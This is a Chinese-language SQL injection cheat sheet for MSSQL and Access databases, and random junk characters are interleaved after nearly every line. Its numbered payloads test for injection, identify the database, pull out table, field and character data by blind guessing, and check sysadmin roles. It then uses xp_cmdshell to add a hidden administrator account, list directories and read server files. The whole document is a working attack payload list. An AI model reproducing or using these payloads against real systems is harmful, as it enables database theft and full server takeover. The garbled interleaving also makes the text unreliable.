1.判断是否有注入;and 1=1 ;and 1=2 }@g#S@o
2.初步判断是否是mssql ;and user>0 YZp]vlm~
OH~I+=}.
3.注入参数是字符'and [查询条件] and ''=' m*TJ@gI*t
k12mxR/
4.搜索时没过滤参数的'and [查询条件] and '%25'=' $h'>Zvf
GoKMi[b
5.判断数据库系统 ?s: 2~Qlu
|7G=f9V
;and (select count(*) from sysobjects)>0 mssql "gi 1{
GSg/I.)S
;and (select count(*) from msysobjects)>0 access N~M-|^L
VW9BQs2w
LtBm }0
f.u[!T
6.猜数据库 ;and (select Count(*) from [数据库名])>0 K7d]p0d'
e+O0l
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Jm
G)=$,
u|E9X[%
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 5,WDmhJ
e@{8G^o>D
9.(1)猜字段的ascii值(access) {\-IAuM
cX@72
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 gOA]..lh
*AN2&>Y
(2)猜字段的ascii值(mssql) Z9 tjo1X
KRP)y{~o
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Hk;) l3oB
!8>tT
10.测试权限结构(mssql) F!yejn
[
?gOZY\[ma
.e%B'
Nv_"?er+y
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- <rF Y$
?x
:ugj+
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- >=U n=Q%
g\
p;
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- p[-buB]
EK}f-Xei
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- DvvjIYB~
u-E*_%y
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- KcX] g*wy
@~<M_63
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- cLe659 &
kVe_2oQ_>
;and 1=(select IS_MEMBER('db_owner'));-- uia-w^F e
? k*s!YCZ
O
WVa&8O
Y:XxTa*
11.添加mssql和系统的帐户 `l95I7
skP2IMa75
;exec master.dbo.sp_addlogin username;-- g4^df%)&
;exec master.dbo.sp_password null,username,password;-- CEos`
D+vHl}
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- E`SFr
hUy\)GsT
;exec master.dbo.xp_cmdshell 'net user username password G>0S(M)
u9"1%
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- }x1*4+Y1
r z%=qY
;exec master.dbo.xp_cmdshell 'net user username password /add';-- y2eeE CS]
Awad!_VdHS
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- n.$wW
=
C.$`HGv
C0F#PXUy
<w d+cPZQr
12.(1)遍历目录 kiFTx
&gf
sX,oJIt
;create table dirs(paths varchar(100), id int) e'uI~%$NJL
?gMxGH:B.&
;insert dirs exec master.dbo.xp_dirtree 'c:\' ?5!>k^q
G6(U\VFqO
;and (select top 1 paths from dirs)>0 ;F;`y),
+<P%v k
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ')/yBH9mR
2*K _RMr~
7.PG*q
wZm=h8d
(2)遍历目录 )_nc;&%w
n1xN:A
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- "p~1|?T
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 QviH+9
p}NIZ)]$
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 *a7&v3X
u@$C i/J*
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 u;Q'xuo3
b;O|-2AR
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 T.zUerbO
%Ln7{w
Y|=/*?o}
F? kW{,*
13.mssql中的存储过程 |8b*BnS
e8@@Pi<sB
xp_regenumvalues 注册表根键, 子键 &